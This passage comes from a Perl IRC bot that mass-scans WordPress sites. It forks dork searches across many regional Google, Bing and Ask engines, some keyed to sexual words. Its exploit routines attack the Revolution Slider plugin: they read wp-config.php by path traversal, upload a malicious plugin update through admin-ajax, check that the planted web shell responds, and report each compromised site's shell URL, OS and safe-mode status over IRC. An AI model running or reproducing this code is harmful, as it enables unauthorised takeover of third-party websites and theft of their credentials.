  1871.         if ($engine =~ /klitoris/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Klitoris",$type,$nick); } exit; } }
  1872.  
  1873.         if ($engine =~ /masturbasi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Masturbasi",$type,$nick); } exit; } }
  1874.  
  1875.         if ($engine =~ /onani/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Onani",$type,$nick); } exit; } }
  1876.  
  1877.         if ($engine =~ /sperma/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Sperma",$type,$nick); } exit; } }
  1878.  
  1879.         if ($engine =~ /anal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AnaL",$type,$nick); } exit; } }
  1880.  
  1881.         if ($engine =~ /puting/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Puting",$type,$nick); } exit; } }
  1882.  
  1883.         if ($engine =~ /penis/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Penis",$type,$nick); } exit; } }
  1884.  
  1885.         if ($engine =~ /googleCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCA",$type,$nick); } exit; } }
  1886.  
  1887.         if ($engine =~ /googleDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeDE",$type,$nick); } exit; } }
  1888.  
  1889.         if ($engine =~ /googleUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeUK",$type,$nick); } exit; } }
  1890.  
  1891.         if ($engine =~ /googleFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeFR",$type,$nick); } exit; } }
  1892.  
  1893.         if ($engine =~ /googleES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeES",$type,$nick); } exit; } }
  1894.  
  1895.         if ($engine =~ /googleIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIT",$type,$nick); } exit; } }
  1896.  
  1897.         if ($engine =~ /googleNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNL",$type,$nick); } exit; } }
  1898.  
  1899.         if ($engine =~ /googleBE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeBE",$type,$nick); } exit; } }
  1900.  
  1901.         if ($engine =~ /googleCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCH",$type,$nick); } exit; } }
  1902.  
  1903.         if ($engine =~ /googleSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeSE",$type,$nick); } exit; } }
  1904.  
  1905.         if ($engine =~ /googleDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeDK",$type,$nick); } exit; } }
  1906.  
  1907.         if ($engine =~ /googleNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNO",$type,$nick); } exit; } }
  1908.  
  1909.         if ($engine =~ /googleNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNZ",$type,$nick); } exit; } }
  1910.  
  1911.         if ($engine =~ /googleIE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIE",$type,$nick); } exit; } }
  1912.  
  1913.         if ($engine =~ /googleBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeBR",$type,$nick); } exit; } }
  1914.  
  1915.         if ($engine =~ /googleAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeAR",$type,$nick); } exit; } }
  1916.  
  1917.         if ($engine =~ /googleCO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCO",$type,$nick); } exit; } }
  1918.  
  1919.         if ($engine =~ /googleCU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCU",$type,$nick); } exit; } }
  1920.  
  1921.         if ($engine =~ /googleCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCL",$type,$nick); } exit; } }
  1922.  
  1923.         if ($engine =~ /googleMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeMX",$type,$nick); } exit; } }
  1924.  
  1925.         if ($engine =~ /googleAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeAU",$type,$nick); } exit; } }
  1926.  
  1927.         if ($engine =~ /googleRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeRU",$type,$nick); } exit; } }
  1928.  
  1929.         if ($engine =~ /googleAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeAT",$type,$nick); } exit; } }
  1930.  
  1931.         if ($engine =~ /googlePL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLePL",$type,$nick); } exit; } }
  1932.  
  1933.         if ($engine =~ /googleIL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIL",$type,$nick); } exit; } }
  1934.  
  1935.         if ($engine =~ /googleTR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeTR",$type,$nick); } exit; } }
  1936.  
  1937.         if ($engine =~ /googleUA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeUA",$type,$nick); } exit; } }
  1938.  
  1939.         if ($engine =~ /googleGR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeGR",$type,$nick); } exit; } }
  1940.  
  1941.         if ($engine =~ /googleJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeJP",$type,$nick); } exit; } }
  1942.  
  1943.         if ($engine =~ /googleCN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCN",$type,$nick); } exit; } }
  1944.  
  1945.         if ($engine =~ /googleMY/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeMY",$type,$nick); } exit; } }
  1946.  
  1947.         if ($engine =~ /googleTH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeTH",$type,$nick); } exit; } }
  1948.  
  1949.         if ($engine =~ /googleIN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIN",$type,$nick); } exit; } }
  1950.  
  1951.         if ($engine =~ /googleKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeKR",$type,$nick); } exit; } }
  1952.  
  1953.         if ($engine =~ /googleRO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeRO",$type,$nick); } exit; } }
  1954.  
  1955.         if ($engine =~ /googleTW/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeTW",$type,$nick); } exit; } }
  1956.  
  1957.         if ($engine =~ /googleZA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeZA",$type,$nick); } exit; } }
  1958.  
  1959.         if ($engine =~ /googlePT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLePT",$type,$nick); } exit; } }
  1960.  
  1961.         if ($engine =~ /bingDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingDE",$type,$nick); } exit; } }
  1962.  
  1963.         if ($engine =~ /bingUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingUK",$type,$nick); } exit; } }
  1964.  
  1965.         if ($engine =~ /bingCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCA",$type,$nick); } exit; } }
  1966.  
  1967.         if ($engine =~ /bingBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBR",$type,$nick); } exit; } }
  1968.  
  1969.         if ($engine =~ /bingFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingFR",$type,$nick); } exit; } }
  1970.  
  1971.         if ($engine =~ /bingES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingES",$type,$nick); } exit; } }
  1972.  
  1973.         if ($engine =~ /bingIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingIT",$type,$nick); } exit; } }
  1974.  
  1975.         if ($engine =~ /bingBE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBE",$type,$nick); } exit; } }
  1976.  
  1977.         if ($engine =~ /bingNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNL",$type,$nick); } exit; } }
  1978.  
  1979.         if ($engine =~ /bingPT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingPT",$type,$nick); } exit; } }
  1980.  
  1981.         if ($engine =~ /bingNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNO",$type,$nick); } exit; } }
  1982.  
  1983.         if ($engine =~ /bingDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingDK",$type,$nick); } exit; } }
  1984.  
  1985.         if ($engine =~ /bingSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingSE",$type,$nick); } exit; } }
  1986.  
  1987.         if ($engine =~ /bingCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCH",$type,$nick); } exit; } }
  1988.  
  1989.         if ($engine =~ /bingNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNZ",$type,$nick); } exit; } }
  1990.  
  1991.         if ($engine =~ /bingRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingRU",$type,$nick); } exit; } }
  1992.  
  1993.         if ($engine =~ /bingJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingJP",$type,$nick); } exit; } }
  1994.  
  1995.         if ($engine =~ /bingCN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCN",$type,$nick); } exit; } }
  1996.  
  1997.         if ($engine =~ /bingKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingKR",$type,$nick); } exit; } }
  1998.  
  1999.         if ($engine =~ /bingMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingMX",$type,$nick); } exit; } }
  2000.  
  2001.         if ($engine =~ /bingAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingAR",$type,$nick); } exit; } }
  2002.  
  2003.         if ($engine =~ /bingCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCL",$type,$nick); } exit; } }
  2004.  
  2005.         if ($engine =~ /bingAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingAU",$type,$nick); } exit; } }
  2006.  
  2007.         if ($engine =~ /askCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKCA",$type,$nick); } exit; } }
  2008.  
  2009.         if ($engine =~ /askDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKDE",$type,$nick); } exit; } }
  2010.  
  2011.         if ($engine =~ /askIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKIT",$type,$nick); } exit; } }
  2012.  
  2013.         if ($engine =~ /askFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKFR",$type,$nick); } exit; } }
  2014.  
  2015.         if ($engine =~ /askES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKES",$type,$nick); } exit; } }
  2016.  
  2017.         if ($engine =~ /askRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKRU",$type,$nick); } exit; } }
  2018.  
  2019.         if ($engine =~ /askNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKNL",$type,$nick); } exit; } }
  2020.  
  2021.         if ($engine =~ /askUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKUK",$type,$nick); } exit; } }
  2022.  
  2023.         if ($engine =~ /askBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKBR",$type,$nick); } exit; } }
  2024.  
  2025.         if ($engine =~ /askPL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKPL",$type,$nick); } exit; } }
  2026.  
  2027.         if ($engine =~ /askAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKAU",$type,$nick); } exit; } }
  2028.  
  2029.         if ($engine =~ /askAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKAT",$type,$nick); } exit; } }
  2030.  
  2031.         if ($engine =~ /askJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKJP",$type,$nick); } exit; } }
  2032.  
  2033.         if ($engine =~ /askSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKSE",$type,$nick); } exit; } }
  2034.  
  2035.         if ($engine =~ /askMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKMX",$type,$nick); } exit; } }
  2036.  
  2037.         if ($engine =~ /askNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKNO",$type,$nick); } exit; } }
  2038.  
  2039.         if ($engine =~ /askDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKDK",$type,$nick); } exit; } }
  2040.  
  2041.        
  2042.  
  2043. }
  2044.  
  2045.  
  2046.  
  2047. #########################################       Exploiting
  2048.  
  2049.  
  2050.  
  2051. sub revslider() {
  2052.  
  2053.     my $chan = $_[0];
  2054.  
  2055.     my $bug = $_[1];
  2056.  
  2057.     my $dork = $_[2];
  2058.  
  2059.     my $engine = $_[3];
  2060.  
  2061.     my $nick = $_[4];
  2062.  
  2063.     my $count = 0;
  2064.  
  2065.         my @list = &search_engine($chan,$bug,$dork,$engine,$revlogo,$nick);
  2066.  
  2067.         my $num = scalar(@list);
  2068.  
  2069.         if ($num > 0) {
  2070.  
  2071.             foreach my $site (@list) {
  2072.  
  2073.                 $count++;
  2074.  
  2075.         if ($count == $num-1) { &msg("$chan","14I'm Done in 15$engine "); }
  2076.  
  2077.         my $test = "http://".$site.$bug;
  2078.  
  2079.         my $luph = "http://".$site."wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php";
  2080.  
  2081.         my $html = &get_content($test);
  2082.  
  2083.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  2084.  
  2085.         if ($html =~ /0/ || $html =~ m/1 0/i ) {
  2086.  
  2087.         &finder($chan,$site,$engine,$nick,$revlogo);sleep(5);
  2088.  
  2089.         &satu_xpl($test,$chan,$site,$engine,$nick);sleep(5);
  2090.  
  2091.         &tiga_xpl($test,$chan,$site,$engine,$nick);sleep(5);
  2092.  
  2093.         &finder2($chan,$site,$engine,$nick,$revlogo);sleep(5);
  2094.  
  2095.         &empat_xpl($test,$chan,$site,$engine,$nick);sleep(5);
  2096.  
  2097.         &limo_xpl($test,$chan,$site,$engine,$nick);sleep(5);
  2098.  
  2099.         &finder3($chan,$site,$engine,$nick,$revlogo);sleep(5);
  2100.  
  2101.         #&mailer($chan,$site,$engine,$nick,$revlogo);sleep(2);
  2102.  
  2103. #       &bogex2($luph,$chan,$site,$engine,$nick);sleep(2);
  2104.  
  2105.             } else { }
  2106.  
  2107.             } exit; }
  2108.  
  2109.         }
  2110.  
  2111.     }
  2112.  
  2113. }
  2114.  
  2115.    
  2116.  
  2117. sub satu_xpl() {
  2118.  
  2119.     my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0, SSL_version => 'TLSv1:!TLSv11:!TLSv12:!SSLv2:!SSLv3'});
  2120.  
  2121.     $ua->timeout(10);
  2122.  
  2123.     $ua->agent($uagent);
  2124.  
  2125.     my $url    = $_[0];
  2126.  
  2127.     my $chan   = $_[1];
  2128.  
  2129.     my $site   = $_[2];
  2130.  
  2131.     my $engine = $_[3];
  2132.  
  2133.     my $nick = $_[4];
  2134.  
  2135.     my $action = "revslider_ajax_action";
  2136.  
  2137.     my $update_file = "revslider.zip";
  2138.  
  2139.     my $bypass = "http://".$site."errors.php";
  2140.  
  2141.     my $shell = "http://".$site."wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php";
  2142.  
  2143.     my $bogex = "http://".$site."wp-content.php";
  2144.  
  2145.     my $exploit = $ua->post("$url", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
  2146.  
  2147.     my $status  = $exploit->as_string;
  2148.  
  2149.     if ($status =~ /Wrong update extracted folder/) {
  2150.  
  2151.     my $check = &get_content($shell."?bajak"); &get_content($shell."?cpanel"); &get_content($shell."?bogel");
  2152.  
  2153.     if ($check =~ /bogel - exploit/ || $check =~ /aanK - exploit/){
  2154.  
  2155.     my $safe = "";
  2156.  
  2157.     my $os   = "";
  2158.  
  2159.     my $uid  = "";
  2160.  
  2161.     if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  2162.  
  2163.     if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
  2164.  
  2165.     if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
  2166.  
  2167.     my $lari = &get_content($bogex); &get_content($bogex."?cpanel");
  2168.  
  2169.     if ($lari =~ /bogel - exploit/ || $lari =~ /aanK - exploit/){
  2170.  
  2171.     &msg("$admin","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $bogex 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2172.  
  2173.     &msg("$nick","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $bogex 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2174.  
  2175.     &msg("$chan","$revlogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2176.  
  2177.     &mylove($bypass,$chan,$site,$engine);
  2178.  
  2179.     } else {
  2180.  
  2181.     &msg("$admin","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $shell 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2182.  
  2183.     &msg("$nick","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $shell 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2184.  
  2185.     &msg("$chan","$revlogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2186.  
  2187.     &mylove($bypass,$chan,$site,$engine);
  2188.  
  2189.         }
  2190.  
  2191.     }
  2192.  
  2193.     }
  2194.  
  2195. }
  2196.  
  2197.  
  2198.  
  2199. sub tiga_xpl() {
  2200.  
  2201.     my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0, SSL_version => 'TLSv1:!TLSv11:!TLSv12:!SSLv2:!SSLv3'});
  2202.  
  2203.     $ua->timeout(10);
  2204.  
  2205.     $ua->agent($uagent);
  2206.  
  2207.     my $url    = $_[0];
  2208.  
  2209.     my $chan   = $_[1];
  2210.  
  2211.     my $site   = $_[2];
  2212.  
  2213.     my $engine = $_[3];
  2214.  
  2215.     my $nick = $_[4];
  2216.  
  2217.     my $action = "revolution-slider_ajax_action";
  2218.  
  2219.     my $update_file = "revolution-slider.zip";
  2220.  
  2221.     my $bypass = "http://".$site."errors.php";
  2222.  
  2223.     my $shell = "http://".$site."wp-content/plugins/revolution-slider/temp/update_extract/revolution-slider/.libs.php";
  2224.  
  2225.     my $bogex = "http://".$site."wp-content.php";
  2226.  
  2227.     my $exploit = $ua->post("$url", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
  2228.  
  2229.     my $status  = $exploit->as_string;
  2230.  
  2231.     if ($status =~ /Wrong update extracted folder/) {
  2232.  
  2233.     my $check = &get_content($shell."?bajak"); &get_content($shell."?cpanel");&get_content($shell."?bogel"); sleep(3);
  2234.  
  2235.     if ($check =~ /bogel - exploit/ || $check =~ /aanK - exploit/){
  2236.  
  2237.     my $safe = "";
  2238.  
  2239.     my $os   = "";
  2240.  
  2241.     my $uid  = "";
  2242.  
  2243.     if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  2244.  
  2245.     if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
  2246.  
  2247.     if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
  2248.  
  2249.     my $lari = &get_content($bogex); &get_content($bogex."?cpanel");
  2250.  
  2251.     if ($lari =~ /bogel - exploit/i){
  2252.  
  2253.     &msg("$admin","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $bogex 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2254.  
  2255.     &msg("$nick","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $bogex 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2256.  
  2257.     &msg("$chan","$revlogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2258.  
  2259.     &mylove($bypass,$chan,$site,$engine);
  2260.  
  2261.     } else {
  2262.  
  2263.     &msg("$admin","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $shell 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2264.  
  2265.     &msg("$nick","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $shell 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2266.  
  2267.     &msg("$chan","$revlogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2268.  
  2269.     &mylove($bypass,$chan,$site,$engine);
  2270.  
  2271.         }
  2272.  
  2273.     }
  2274.  
  2275.     }
  2276.  
  2277. }
  2278.  
  2279.  
  2280.  
  2281. sub empat_xpl() {
  2282.  
  2283.     my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0, SSL_version => 'TLSv1:!TLSv11:!TLSv12:!SSLv2:!SSLv3'});
  2284.  
  2285.     $ua->timeout(10);
  2286.  
  2287.     $ua->agent($uagent);
  2288.  
  2289.     my $url    = $_[0];
  2290.  
  2291.     my $chan   = $_[1];
  2292.  
  2293.     my $site   = $_[2];
  2294.  
  2295.     my $engine = $_[3];
  2296.  
  2297.     my $nick = $_[4];
  2298.  
  2299.     my $action = "revslider_ajax_action";
  2300.  
  2301.     my $update_file = "revslider.zip";
  2302.  
  2303.     my $target = &get_content("http://".$site);
  2304.  
  2305.     if ($target =~ /\/wp-content\/(.*?)\/style\.css/ig){
  2306.  
  2307.     $sempak = $1;
  2308.  
  2309.     foreach my $black (@unix) {
  2310.  
  2311.     my $bypass = "http://".$site."errors.php";
  2312.  
  2313.     my $shell = "http://".$site."wp-content/".$sempak.$black."/revslider/.libs.php";
  2314.  
  2315.     my $bogex = "http://".$site."wp-content.php";
  2316.  
  2317.     my $exploit = $ua->post("$url", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
  2318.  
  2319.     my $status  = $exploit->as_string;
  2320.  
  2321.     if ($status =~ /Wrong update extracted folder/) {
  2322.  
  2323.     my $check = &get_content($shell."?bajak"); &get_content($shell."?cpanel");&get_content($shell."?bogel"); sleep(3);
  2324.  
  2325.     if ($check =~ /bogel - exploit/ || $check =~ /aanK - exploit/){
  2326.  
  2327.     my $safe = "";
  2328.  
  2329.     my $os   = "";
  2330.  
  2331.     my $uid  = "";
  2332.  
  2333.     if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  2334.  
  2335.     if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
  2336.  
  2337.     if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
  2338.  
  2339.     my $lari = &get_content($bogex); &get_content($bogex."?cpanel");
  2340.  
  2341.     if ($lari =~ /bogel - exploit/i){
  2342.  
  2343.     &msg("$admin","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $bogex 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2344.  
  2345.     &msg("$nick","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $bogex 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2346.  
  2347.     &msg("$chan","$revlogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2348.  
  2349.     &mylove($bypass,$chan,$site,$engine);
  2350.  
  2351.     } else {
  2352.  
  2353.     &msg("$admin","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $shell 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2354.  
  2355.     &msg("$nick","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $shell 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2356.  
  2357.     &msg("$chan","$revlogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2358.  
  2359.     &mylove($bypass,$chan,$site,$engine);
  2360.  
  2361.         }
  2362.  
  2363.     }
  2364.  
  2365.     }
  2366.  
  2367. }
  2368.  
  2369. }
  2370.  
  2371. }
  2372.  
  2373.  
  2374.  
  2375. sub limo_xpl() {
  2376.  
  2377.     my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0, SSL_version => 'TLSv1:!TLSv11:!TLSv12:!SSLv2:!SSLv3'});
  2378.  
  2379.     $ua->timeout(10);
  2380.  
  2381.     $ua->agent($uagent);
  2382.  
  2383.     my $url    = $_[0];
  2384.  
  2385.     my $chan   = $_[1];
  2386.  
  2387.     my $site   = $_[2];
  2388.  
  2389.     my $engine = $_[3];
  2390.  
  2391.     my $nick = $_[4];
  2392.  
  2393.     my $action = "revslider_ajax_action";
  2394.  
  2395.     my $update_file = "revslider.zip";
  2396.  
  2397.     my $target = &get_content("http://".$site);
  2398.  
  2399.     if ($target =~ /\/wp-content\/(.*?)\/style\.css/ig){
  2400.  
  2401.     $sempak = $1;
  2402.  
  2403.     foreach my $black (@kaca) {
  2404.  
  2405.     my $bypass = "http://".$site."errors.php";
  2406.  
